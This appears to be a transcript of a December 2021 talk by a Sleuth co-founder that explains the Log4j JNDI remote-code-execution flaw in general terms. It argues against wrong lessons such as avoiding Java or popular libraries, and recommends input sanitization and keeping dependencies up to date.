Don Brown
December 16th, 2021
The wrong lessons to learn from the Log4j vulnerability
This feature allows you to include textual data into a log string. Specifically, you could use JNDI URLs. JNDI is a Java directory API to include user features into your log messages, such as a user's email address. If log messages are written by a developer, no problem, but the reality is that people often take user input and log it directly exposing this feature to them. The kicker, however, is the remote execution part. The response to a JNDI call could be a serialized object, and then Java would helpfully decide to deserialize it for you, including executing things like constructors. So basically, allowing them to run ... The attacker to run any code they want on your system.
Now from this experience, people could be learning the wrong lessons, and I want to go through them one by one. First, the knee jerk response to this, particularly for people who already might have this opinion, is don't use Java. Java is an old technology, it's brittle, it's slow, it's for big enterprises, and it has so many problems, and so if you don't use Java, then this kind of thing won't happen to you. But that couldn't be further from the truth. This actually has very little to do with Java, this vulnerability, it has to do with the library and the pattern which could apply to any language, any library, in almost any situation. So don't let your distaste, as valid or invalid as that may be blind you from the reality of this vulnerability and the real lessons it has to teach us. Security requires constant vigilance and isn't as simple as using one thing versus another.
Another wrong lesson to take away is to avoid popular libraries, like log for jay. The thinking goes, and there's a little bit of truth to this, the thinking goes that if it's something really common that everybody is using, if there's ever a problem in it, now we're all screwed. So the best way to avoid this is to avoid the common things and try to use little libraries that aren't very well known or don't have this wide adoption. But the truth here, the bigger truth here, is that we only know about log for jay because it was a popular library.
Popular open sources libraries are going to get a lot more attention from security researchers, from teams that are using this in production, and so a lot of its problems are going to be found a lot quite quicker than a library that nobody uses. Because if nobody is using it, the security researchers aren't going to be bothered with trying to find vulnerabilities because who cares? And let's face it, if you're importing a third party library, you're probably not going to go line through line through its code to see if there's any problems. You're just going to accept it and move on. So you're actually safer to use more common libraries, such as log for jay.
Another wrong lesson, avoid enterprise libraries, and I should probably put this one in quotes, "enterprise libraries". The idea here is kind of right in that what people consider an enterprise library usually is other word of saying a bloated, a complicated, needlessly complicated library that just does way too many things that I don't care about, and so then they call that enterprise. Now there's some truth to this as well. When you're choosing a library, you should look at what feature set it provides and make sure that your needs are a good match for what the library provides. There is really no such thing as bad libraries or good libraries, there's only libraries that are more appropriate for your case and those that aren't. But remember, you are responsible for what you add to your project, whether you write the code yourself, whether you import a third party library, you are now responsible for that function and any vulnerabilities it contains.
I'm saving some of the worst lessons to last, and this is one of my least favorites, the lesson here is that backward compatibility is bad. The thinking goes that log for jay has this problem because they didn't want to remove it in order to not negatively affect the 3% of their users that we're using this JNDI lookup feature. And so therefore, we should throw the baby out with the bath water and libraries should be able to just evolve whenever they need, do all the right things as soon as possible, and who cares about backwards compatibility. But that would've actually made the situation way worse.
Backward compatibility is huge in the security world because if your library has backward compatibility, that means you can upgrade it easily. And one of the number one ways to deal with these kind of vulnerabilities is let's face it, they're going to happen, is to be able to quickly upgrade to the fix when it comes out. But if a library didn't maintain backward compatibility, then it's going to be a pain in the ass to upgrade because you're going to have to fix all the different things that are broken.
So backward compatibility is certainly not something that's an absolute, you should always have it. Sometimes you need to break it just like log for jay did with this vulnerability, they removed the feature that caused it. But that's not enough. As a service provider that is using libraries, I want to be able to just drop in the new version and not have to think about what it's going to break. So backward compatibility is important, however, it is not an absolute.
And finally, my least favorite lesson that I've heard people take away from this is you know what? Screw it. I'm not going to use any libraries. I'm going to write it myself. Logging is a very simple thing, I'll just write my own library that allows me to log and allows me to filter and allows me to interpolate and allows me to direct logs to different places. No, no, no. Don't write things yourself. Don't write common library functions yourself. Don't write your own database object mapper. Don't write your own log library. Don't write your own web framework. I could go on and on.
If this is a common problem that many applications have and there are popular maintained open source answers to these problems, use those. Don't write your own. Now one could think that well, but if I wrote my own library then I wouldn't be vulnerable to log for jay issue. Maybe. Maybe. Do you have security researchers that are looking through all of your code to find problems? Probably not because the problem with log for jay wasn't the fact that it was this big complicated library, it was that they were taking something that was meant for a developer and people were passing in user provided data into that. So the library in a sense was being used for something that it wasn't built for. This is a problem that has nothing to do with whether it's a popular open source library or not. If you wrote your own, you'd have this exact same problem, except now you don't have anyone else looking into it to find those bugs, to make those improvements, to do the security analysis of it. You don't understand the cost that you will have to pay for the life cycle of your application.
So these are some things that I think people might be taking away from this experience and I recommend you not, and hopefully understand it. There are three things though that I think are critical to take away from this experience. Number one, sanitized user input. This whole problem happened because a lack of user input sanitization, and I do this myself. You take information from a user, you drop it into a log statement to make it easier for you to figure out what they were doing, and at that same time, make yourself vulnerable. Now we already learned the danger of not sanitizing user input for SQL injection, for cross site scripting errors. I could go on and on, this is another example of that. So the lesson is whenever you have user input in your system, always either sanitize it or be very, very careful what you send it to and how you use that.
Number two, use popular libraries. Even though it seems like this is an anti pattern in that if I didn't use popular libraries, I wouldn't be exposed to this. The fact that it was found and the fact that it was quickly fixed is a testament to the value of having using a popular open source library that you can quickly upgrade. And that leads me to my final bit of lesson or wisdom, I guess you could say, keep your libraries up to date. Vulnerabilities are going to happen. It's a fact of life. There is just way too much code inside of a modern web application, or really any application, to try to know every single thing that's going on and never make mistakes.
Mistakes are going to happen but what you can control is how you keep your. Libraries up to date. If you have a process of always keeping them up to date, if you're already up to date and a new vulnerability fix comes out, you can just quickly jump to that fix. It's going to be way easier. You should be able to upgrade libraries within minutes, hours, if not minutes, and that's the number one thing you can keep yourself secure. Vulnerability is going to happen but you need to be able to fix it quickly when they do come up.Hi, I'm Don, co-founder of Sleuth, the number one DORA metrics tracker, long time Java developer, and Apache software foundation member. Notable, because that's where log for jay lives. I stream on Twitch and I was discussing the log for jay vulnerability that came out recently and it hit me that folks are learning the wrong lessons from this experience, and so this video is here to set the record straight. The log for jay vulnerability is a severe remote code execution vulnerability affecting basically the whole internet. Big companies like Amazon, Microsoft, Google, IBM, are all affected. There are many better videos on this but in a nutshell, a popular Java library called log for jay has a feature that allows developers to easily add extra data into the log messages, and it was recently to discovered to be vulnerable to remote code execution attacks.